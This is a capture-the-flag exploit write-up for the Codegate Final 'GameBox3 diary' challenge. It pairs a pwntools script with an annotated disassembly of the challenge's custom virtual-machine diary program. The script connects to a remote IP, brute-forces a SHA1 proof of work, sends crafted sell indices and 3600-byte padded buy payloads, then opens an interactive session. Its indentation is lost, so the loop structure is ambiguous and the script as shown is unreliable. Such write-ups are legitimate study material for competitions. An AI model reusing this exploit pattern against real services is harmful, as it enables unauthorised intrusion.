EXP for Codegate Final _GameBox3 diary
#!/usr/bin/env python
# encoding: utf-8
from pwn import *
r = remote("58.229.240.150", 8888)
context.log_level = 'debug'
import random
from hashlib import sha1

# Proof-of-work gate: the service hands out a 6-byte prefix after
# "prefix : "; the loop searches for an integer suffix whose
# sha1(prefix + suffix) hex digest ends in six '0' characters and sends
# that string back.
r.recvuntil("prefix : ")
prefix = r.recv(6)
print(prefix)

counter = 0
while True:
    counter += 1
    candidate = prefix + str(counter)
    if sha1(candidate).hexdigest().endswith('000000'):
        r.sendline(candidate)
        break
# r = process("./vm_tiny.py")
def buy(avatar, data=1):
    """Drive menu option "2" on the remote session ``r``.

    avatar: string sent as the new entry once the "y" answer is given.
    data: 0 answers the confirmation prompt with "n" and returns without
        sending ``avatar``; any other value (default 1) answers "y", sends
        ``avatar`` and waits for the "new dog" acknowledgement.
    """
    r.sendlineafter(">", "2")
    if data != 0:
        r.sendlineafter(">", "y")
        r.sendline(avatar)
        r.recvuntil("new dog")
    else:
        r.sendlineafter(">", "n")
def sell(index):
    """Drive menu option "3" on ``r``: choose "3", then answer the
    "which dog do you want to sell?" prompt with ``index`` (sent as-is)."""
    exchange = (
        (">", "3"),
        ("which dog do you want to sell?\n>", index),
    )
    for expected, reply in exchange:
        r.sendlineafter(expected, reply)
def p(i):
    """Pack the low 21 bits of ``i`` into three 7-bit characters.

    Output order is bits 0-6, then bits 14-20, then bits 7-13; anything
    above bit 20 is discarded. Presumably matches a 3-byte "tri" word with
    7 data bits per byte — inferred from the masks, not stated in the file.
    """
    seven_bits = 0x7F
    low = i & seven_bits
    high = (i >> 14) & seven_bits
    mid = (i >> 7) & seven_bits
    return "".join(chr(part) for part in (low, high, mid))
# buy("aaa")
# for i in range(0x100000, 0x100000 + 10 * 0x1000, 0x1000):
# Six sells with encoded 3-byte index values 0x100000 .. 0x150000,
# stepping by 0x10000 (same order as the individual calls this replaces).
for raw_index in range(0x100000, 0x160000, 0x10000):
    sell(p(raw_index))
# NOTE(review): indentation was lost in this paste. Whether the two `m`
# assignments and `buy(m, 1)` sit inside the 256-iteration loop, and whether
# the three "s"/"s"/"1" sends run once per outer iteration or once per inner
# iteration, cannot be recovered from the text; the line order is preserved
# as-is.
# 256 declined purchases ("n" path of buy), each with a 3600-byte name:
# "@" padded with "z".
for i in range(256):
buy("@".ljust(3600, "z"), 0)
# One accepted purchase: "@", 300 "*", then "z" padding to 3600 bytes.
m = "@" + "*" * 300
m = m.ljust(3600, "z")
buy(m, 1)
# Sends "d" 60 times, then "s", "s", "1" (see the nesting caveat above),
# repeated five times.
for i in range(5):
for j in range(60):
r.sendlineafter(">", "d")
r.sendlineafter(">", "s")
r.sendlineafter(">", "s")
r.sendlineafter(">", "1")
# r.recvuntil(">")
# Hand the session over to the terminal.
r.interactive()
// Program entry (address 0). Sets up the two globals every routine relies on:
//   r10 = table pointer obtained via syscall 4 (annotated as malloc below);
//         tri*(r10) holds the entry count, entries live at r10+3*i
//         (see init_memory and get_content).
//   r9  = value returned by syscall 5; every routine saves it at bp-3 (or
//         pushes it) and re-checks it before returning, jumping to
//         candy_check_failed on mismatch — a stack-canary scheme.
0: sp -= 3
5: r2 = 6
10: r1 = sp  // r1 -> 3-byte stack slot that receives the allocation result
12: r0 = 4
17: syscall // malloc
19: r10 = tri*(r1)
21: r0 = 5
26: syscall  // syscall 5: presumably a random source for the canary — not visible here
28: r9 = r0
30: call 39  // main()
35: r0 ^= r0
37: syscall  // syscall 0 after main returns: presumably exit
main():
// Frame: bp-3 saved canary (r9), bp-6 3-byte menu input.
// Prints the string at 1731 once, then loops: print the menu string at
// 2471, read 3 bytes, dispatch on the first byte '1'..'4'; '5' leaves the
// loop, anything else redisplays the menu.
39: push bp
41: bp = sp
43: sp -= 6
48: r5 = bp
50: r5 -= 3
55: tri*(r5) = r9  // save canary at bp-3
57: r0 = 1731  // string data; the bytes from 1731 on are what the listing shows as "bp *= pc"
62: call puts
67: call 234  // init_memory
72: r0 = 2471  // menu string; the loop re-enters here (jmp 72 at 207)
77: call puts
82: r5 = bp
84: r5 -= 6
89: tri*(r5) = zero
91: r1 = 3
96: r0 = r5
98: call read  // read(bp-6, 3)
103: r5 = bp
105: r5 -= 6
110: low(r6) = low*(r5)  // first input byte
112: cmp low(r6) low(49)  // '1' -> list
117: jne(!=) 132
122: call 302
127: jmp 207
132: cmp low(r6) low(50)  // '2' -> write
137: jne(!=) 152
142: call 496
147: jmp 207
152: cmp low(r6) low(51)  // '3' -> show
157: jne(!=) 172
162: call 793
167: jmp 207
172: cmp low(r6) low(52)  // '4' -> edit
177: jne(!=) 192
182: call 1106
187: jmp 207
192: cmp low(r6) low(53)  // '5' -> leave the menu loop
197: jne(!=) 207
202: jmp 212
207: jmp 72  // any other byte: back to the menu
212: r5 = bp
214: r5 -= 3
219: r6 = tri*(r5)
221: cmp r6 r9  // canary check before returning
223: jne(!=) candy_check_failed
228: sp = bp
230: pop bp
232: pop pc
init_memory:
// Clears the table at r10: the 3-byte count at r10 is set to 0, then the
// 30 bytes from r10+3 (room for ten 3-byte entries) are zeroed with memset.
234: push bp
236: bp = sp
238: sp -= 3
243: r5 = bp
245: r5 -= 3
250: tri*(r5) = r9  // save canary at bp-3
# *(r10) = 0; memset(r10+3, 0, 30)
252: r5 = r10
254: tri*(r5) = zero  // count = 0
256: r5 = r10
258: r5 += 3
263: r2 = 30
268: r1 = 0
273: r0 = r5
275: call memset  // memset(r10+3, 0, 30)
280: r5 = bp
282: r5 -= 3
287: r6 = tri*(r5)
289: cmp r6 r9  // canary check
291: jne(!=) candy_check_failed
296: sp = bp
298: pop bp
300: pop pc
list():
// Frame: bp-3 canary, bp-6 loop index (starts at 1), bp-9 3-byte scratch
// holding "<n>)" plus NUL. For n = 1 .. count (tri*(r10)) it prints "n)",
// then the string at the entry pointer from get_content(n) (the title
// field at offset 0), then the string at 2514.
302: push bp
304: bp = sp
306: sp -= 9
311: r5 = bp
313: r5 -= 3
318: tri*(r5) = r9  // save canary
-6 count
-9 *)
320: r5 = bp
322: r5 -= 6
327: r6 = 1
332: tri*(r5) = r6  // index = 1
334: r0 = 2262
339: call puts
344: r0 = 2275
349: call puts
354: r5 = bp  // loop head
356: r5 -= 6
361: r6 = tri*(r5)  // r6 = index
363: r5 = r10
365: r7 = tri*(r5)  // r7 = count
367: cmp r6 r7
369: jb(>) 464  // index > count: done
374: r5 = bp
376: r5 -= 9
381: r7 = r6
383: r7 += 48  // '0' + index
388: low*(r5) = r7
390: r5++
392: r7 = 41  // ')'
397: low*(r5) = r7
399: r5++
401: low*(r5) = zero  // NUL terminator
403: r5 = bp
405: r5 -= 9
410: r0 = r5
412: call puts  // puts("<n>)")
417: r5 = bp
419: r5 -= 6
424: r0 = tri*(r5)
426: call 1716  // get_content(index) -> entry pointer in r0
431: call puts  // prints the entry's title field
436: r0 = 2514
441: call puts
446: r5 = bp
448: r5 -= 6
453: r6 = tri*(r5)
455: r6++
457: tri*(r5) = r6  // index++
459: jmp 354
464: r0 = 2275
469: call puts
474: r5 = bp
476: r5 -= 3
481: r6 = tri*(r5)
483: cmp r6 r9  // canary check
485: jne(!=) candy_check_failed
490: sp = bp
492: pop bp
494: pop pc
write():
// Adds an entry. Frame: bp-3 canary, bp-6 pointer to the new entry.
// Prints the string at 2329 and returns when count >= 9; otherwise
// count++, obtains a buffer via syscall 4 (same sequence as the entry
// stub's annotated malloc), stores it at r10+3*count, then reads three
// fields: title (up to 30 bytes at +0), content (up to 1200 bytes at +30)
// and key (at +1260, length = the content read result minus one). The
// last byte of each of the first two reads is replaced by NUL. Finally
// 1200 bytes of content are XORed in place with the bytes at +1260.
// Not to be confused with the syscall wrapper also labelled write() at 1592.
496: push bp
498: bp = sp
500: sp -= 6
505: r5 = bp
507: r5 -= 3
512: tri*(r5) = r9  // save canary
514: r5 = r10
516: r6 = tri*(r5)  // r6 = count
518: cmp r6 9
523: js(<) 543
528: r0 = 2329  // count >= 9: print message and return
533: call puts
538: jmp 771(ret)
543: r6++
545: tri*(r5) = r6  // count++
547: r2 = 6
552: r5 = bp
554: r5 -= 6
559: r1 = r5
561: r0 = 4
566: syscall  // result lands in the 3-byte slot at bp-6
568: r5 = bp
570: r5 -= 6
575: r7 = tri*(r5)  // r7 = new entry pointer
577: r5 = r10
579: r8 = r6
581: r8 *= 3
586: r5 += r8
588: tri*(r5) = r7  // table[count] = pointer
590: r0 = 2354
595: call puts
600: r5 = bp
602: r5 -= 6
607: r6 = tri*(r5)
609: r1 = 30
614: r0 = r6
616: call read  // read(entry, 30): title; r0 holds the result afterwards
621: r0--
623: r5 = bp
625: r5 -= 6
630: r6 = tri*(r5)
632: r6 += r0
634: low*(r6) = zero  // entry[result-1] = 0
636: r0 = 2369
641: call puts
646: r5 = bp
648: r5 -= 6
653: r6 = tri*(r5)
655: r6 += 30
660: r1 = 1200
665: r0 = r6
667: call read  // read(entry+30, 1200): content
672: r0--
674: r5 = bp
676: r5 -= 6
681: r6 = tri*(r5)
683: r6 += 30
688: r6 += r0
690: low*(r6) = zero  // entry[30+result-1] = 0
692: r5 = bp
694: r5 -= 6
699: r6 = tri*(r5)
701: r6 += 1260
706: r1 = r0  // key length = content result - 1 (r0 still holds it)
708: r0 = r6
710: call read  // read(entry+1260, r1): key
715: r5 = bp
717: r5 -= 6
722: r6 = tri*(r5)
724: r7 = r6
726: r6 += 30  // r6 -> content
731: r7 += 1260  // r7 -> key
736: r8 ^= r8
738: cmp r8 1200  // for r8 in 0..1199
743: je(==) 771(ret:)
748: r5 ^= r5
750: r4 ^= r4
752: low(r5) = low*(r6)
754: low(r4) = low*(r7)
756: r5 ^= r4
758: low*(r6) = r5  // content[i] ^= key[i]
760: r6++
762: r7++
764: r8++
766: jmp 738
771: r5 = bp
773: r5 -= 3
778: r6 = tri*(r5)
780: cmp r6 r9  // canary check
782: jne(!=) candy_check_failed
787: sp = bp
789: pop bp
791: pop pc
show():
// -6 id
// -9 ptr
// The frame also holds a 1200-byte buffer at bp-1209. Reads a 2-byte
// index, accepts only '1'..'9' that is <= count, resolves it with
// get_content, prints the title, then copies 1200 bytes of content to the
// stack buffer, XORs them with the bytes at entry+1260 and prints the
// result. Any rejected index falls straight through to the epilogue.
793: push bp
795: bp = sp
797: sp -= 1209
802: r5 = bp
804: r5 -= 3
809: tri*(r5) = r9  // save canary
811: r0 = 2428
816: call puts
821: r1 = 2
826: r5 = bp
828: r5 -= 6
833: r0 = r5
835: call read  // read(bp-6, 2): index
840: r6 ^= r6
842: r5 = bp
844: r5 -= 6
849: low(r6) = low*(r5)
851: cmp low(r6) low(49)
856: js(<) 1084  // below '1': skip to epilogue
861: cmp low(r6) low(57)
866: jb(>) 1084  // above '9': skip to epilogue
871: low(r6) -= low(48)  // ASCII digit -> 1..9
876: r5 = r10
878: r7 = tri*(r5)  // r7 = count
880: cmp r6 r7
882: jb(>) 1084  // index > count: skip to epilogue
887: r0 = r6
889: call 1716  // get_content(index)
894: r5 = bp
896: r5 -= 9
901: tri*(r5) = r0  // ptr = entry
903: r0 = 2275
908: call puts
913: r0 = 2361
918: call puts
923: r5 = bp
925: r5 -= 9
930: r0 = tri*(r5)
932: call puts // puts title
937: r0 = 2514
942: call puts
947: r0 = 2275
952: call puts
957: r2 = 1200
962: r5 = bp
964: r5 -= 9
969: r5 = tri*(r5)
971: r5 += 30
976: r1 = r5  // source: entry+30 (content)
978: r5 = bp
980: r5 -= 1209
985: r0 = r5  // destination: stack buffer
987: call 1497 // memcpy(bp-1209, entry+30, 1200)
992: r5 = bp
994: r5 -= 1209
999: r6 = r5  // r6 -> stack copy of content
1001: r5 = bp
1003: r5 -= 9
1008: r7 = tri*(r5)
1010: r7 += 1260  // r7 -> key
1015: r8 ^= r8
1017: cmp r8 1200  // for r8 in 0..1199
1022: je(==) 1050
1027: r5 ^= r5
1029: r4 ^= r4
1031: low(r5) = low*(r6)
1033: low(r4) = low*(r7)
1035: r5 ^= r4
1037: low*(r6) = r5  // copy[i] ^= key[i]
1039: r6++
1041: r7++
1043: r8++
1045: jmp 1017
1050: r5 = bp
1052: r5 -= 1209
1057: r0 = r5
1059: call puts  // prints the XORed stack copy
1064: r0 = 2514
1069: call puts
1074: r0 = 2275
1079: call puts
1084: r5 = bp
1086: r5 -= 3
1091: r6 = tri*(r5)
1093: cmp r6 r9  // canary check
1095: jne(!=) candy_check_failed
1100: sp = bp
1102: pop bp
1104: pop pc
edit()
// Frame: bp-3 canary, bp-6 2-byte index input, bp-9 entry pointer.
// Same index validation as show() ('1'..'9' and <= count). Then re-reads
// the title (30 bytes at +0) and content (1200 bytes at +30) into the
// existing entry, NUL-terminating each at result-1, prints the bytes at
// entry+1260 (the key — no new key is read here), and XORs 1200 bytes of
// content with that key in place.
1106: push bp
1108: bp = sp
1110: sp -= 9
1115: r5 = bp
1117: r5 -= 3
1122: tri*(r5) = r9  // save canary
1124: r0 = 2428 // index
1129: call puts
1134: r1 = 2
1139: r5 = bp
1141: r5 -= 6
1146: r0 = r5
1148: call read  // read(bp-6, 2)
1153: r6 ^= r6
1155: r5 = bp
1157: r5 -= 6
1162: low(r6) = low*(r5)
1164: cmp low(r6) low(49)
1169: js(<) 1415  // below '1': skip to epilogue
1174: cmp low(r6) low(57)
1179: jb(>) 1415  // above '9': skip to epilogue
1184: low(r6) -= low(48)  // ASCII digit -> 1..9
1189: r5 = r10
1191: r7 = tri*(r5)  // r7 = count
1193: cmp r6 r7
1195: jb(>) 1415  // index > count: skip to epilogue
1200: r0 = r6
1202: call 1716 // get content_ptr by index
1207: r5 = bp
1209: r5 -= 9
1214: tri*(r5) = r0  // ptr = entry
1216: r0 = 2354
1221: call puts
1226: r5 = bp
1228: r5 -= 9
1233: r6 = tri*(r5)
1235: r1 = 30
1240: r0 = r6
1242: call read  // read(entry, 30): title
1247: r0--
1249: r5 = bp
1251: r5 -= 9
1256: r6 = tri*(r5)
1258: r6 += r0
1260: low*(r6) = zero  // entry[result-1] = 0
1262: r0 = 2405
1267: call puts
1272: r5 = bp
1274: r5 -= 9
1279: r6 = tri*(r5)
1281: r6 += 30
1286: r1 = 1200
1291: r0 = r6
1293: call read  // read(entry+30, 1200): content
1298: r0--
1300: r5 = bp
1302: r5 -= 9
1307: r6 = tri*(r5)
1309: r6 += 30
1314: r6 += r0
1316: low*(r6) = zero  // entry[30+result-1] = 0
1318: r0 = 2415 // secret key
1323: call puts
1328: r5 = bp
1330: r5 -= 9
1335: r6 = tri*(r5)
1337: r6 += 1260
1342: r0 = r6
1344: call puts  // prints the bytes at entry+1260
1349: r0 = 2514 // \n
1354: call puts
1359: r5 = bp
1361: r5 -= 9
1366: r6 = tri*(r5)
1368: r7 = r6
1370: r6 += 30  // r6 -> content
1375: r7 += 1260  // r7 -> key
1380: r8 ^= r8
1382: cmp r8 1200  // for r8 in 0..1199
1387: je(==) 1415
1392: r5 ^= r5
1394: r4 ^= r4
1396: low(r5) = low*(r6)
1398: low(r4) = low*(r7)
1400: r5 ^= r4
1402: low*(r6) = r5  // content[i] ^= key[i]
1404: r6++
1406: r7++
1408: r8++
1410: jmp 1382
1415: r5 = bp
1417: r5 -= 3
1422: r6 = tri*(r5)
1424: cmp r6 r9  // canary check
1426: jne(!=) candy_check_failed
1431: sp = bp
1433: pop bp
1435: pop pc
candy_check_failed:
// Target of every failed canary comparison: prints the string at 2436 and
// issues syscall 0 with r0 = 0 (the same sequence the entry stub runs after
// main returns; presumably exit).
1437: r0 = 2436
1442: call puts
1447: r0 ^= r0
1449: syscall
memset(char *, int, size_t)
// r0 = destination, r1 = byte value, r2 = count. Writes low(r1) to r2
// consecutive bytes. Leaf routine: saves r0/r1/r2 on the stack and restores
// them before returning; the pushed r9 is popped into r6 and compared as
// the canary.
1451: push r0
1453: push r1
1455: push r2
1457: push r9
1459: cmp r2 0  // loop while r2 != 0
1464: je(==) 1480
1469: low*(r0) = r1
1471: r0++
1473: r2--
1475: jmp 1459
1480: pop r6
1482: cmp r6 r9  // canary check
1484: jne(!=) candy_check_failed
1489: pop r2
1491: pop r1
1493: pop r0
1495: pop pc
memcpy()
// r0 = destination, r1 = source, r2 = count. Copies r2 bytes one at a time
// through low(r3). Saves r0..r3 and restores them on return; the pushed r9
// is the canary, popped into r6 and compared.
1497: push r0
1499: push r1
1501: push r2
1503: push r3
1505: push r9
1507: cmp r2 0  // loop while r2 != 0
1512: je(==) 1532
1517: low(r3) = low*(r1)
1519: low*(r0) = r3
1521: r0++
1523: r1++
1525: r2--
1527: jmp 1507
1532: pop r6
1534: cmp r6 r9  // canary check
1536: jne(!=) candy_check_failed
1541: pop r3
1543: pop r2
1545: pop r1
1547: pop r0
1549: pop pc
void read(char *, int):
// r0 = buffer, r1 = length. Issues syscall 3 with r1 = 0, r2 = buffer,
// r3 = length. r0 is not saved/restored, so callers see the syscall's
// result in r0 (write()/edit() use it as the byte count).
1551: push r1
1553: push r2
1555: push r3
1557: push r9
1559: r3 = r1  // length
1561: r2 = r0  // buffer
1563: r1 = 0
1568: r0 = 3
1573: syscall
1575: pop r6
1577: cmp r6 r9  // canary check
1579: jne(!=) candy_check_failed
1584: pop r3
1586: pop r2
1588: pop r1
1590: pop pc
void write(char *, int):
// r0 = buffer, r1 = length. Issues syscall 2 with r1 = 1, r2 = buffer,
// r3 = length; mirrors read() above. This is the routine puts() calls,
// distinct from the menu handler also labelled write() at 496.
1592: push r1
1594: push r2
1596: push r3
1598: push r9
1600: r3 = r1  // length
1602: r2 = r0  // buffer
1604: r1 = 1
1609: r0 = 2
1614: syscall
1616: pop r6
1618: cmp r6 r9  // canary check
1620: jne(!=) candy_check_failed
1625: pop r3
1627: pop r2
1629: pop r1
1631: pop pc
void puts(char *):
// r0 = NUL-terminated string. Computes strlen, then calls the write
// wrapper at 1592 with r0 = string, r1 = length. Output length is whatever
// strlen finds, so a missing terminator keeps writing until the first NUL.
1633: push r0
1635: push r1
1637: push r9
1639: r1 = r0  // keep the pointer while strlen clobbers r0
1641: call strlen
1646: exchange r1 r0  // r0 = pointer, r1 = length
1648: call write
1653: pop r6
1655: cmp r6 r9  // canary check
1657: jne(!=) candy_check_failed
1662: pop r1
1664: pop r0
1666: pop pc
int strlen(char *):
// r0 = string. Counts bytes up to the first NUL and returns the count in
// r0 (copied from r1 at 1708). r1/r2 are restored; r0 is the return value.
1668: push r1
1670: push r2
1672: push r9
1674: r1 ^= r1  // counter = 0
1676: r2 ^= r2
1678: low(r2) = low*(r0)
1680: cmp low(r2) low(0)
1685: je(==) 1699
1690: r0++
1692: r1++
1694: jmp 1678
1699: pop r6
1701: cmp r6 r9  // canary check
1703: jne(!=) candy_check_failed
1708: r0 = r1  // return value
1710: pop r2
1712: pop r1
1714: pop pc
get_content():
// r0 = index; returns r0 = tri*(r10 + 3*index), the entry pointer stored by
// write(). Bare routine: no frame, no canary handling, and no range check of
// its own — list(), show() and edit() bound the index before calling it.
1716: r5 = r10
1718: r6 = r0
1720: r6 *= 3
1725: r5 += r6
1727: r0 = tri*(r5)
1729: pop pc
// From 1731 onward the bytes are string data, not code: main() passes 1731
// to puts, and every other puts argument in the listing (2262 .. 2514) lies
// past this point as well. The disassembler decodes them as "bp *= pc";
// nothing jumps or falls through into this region.
1731: bp *= pc
1733: bp *= pc
1735: bp *= pc
1737: bp *= pc
1739: bp *= pc
1741: bp *= pc
1743: bp *= pc
1745: bp *= pc
1747: bp *= pc
1749: bp *= pc
1751: bp *= pc
1753: bp *= pc
1755: bp *= pc
1757: bp *= pc
1759: bp *= pc
1761: bp *= pc
1763: bp *= pc
1765: bp *= pc
1767: bp *= pc
1769: bp *= pc
1771: bp *= pc
1773: bp *= pc
1775: bp *= pc
1777: bp *= pc
1779: bp *= pc
1781: bp *= pc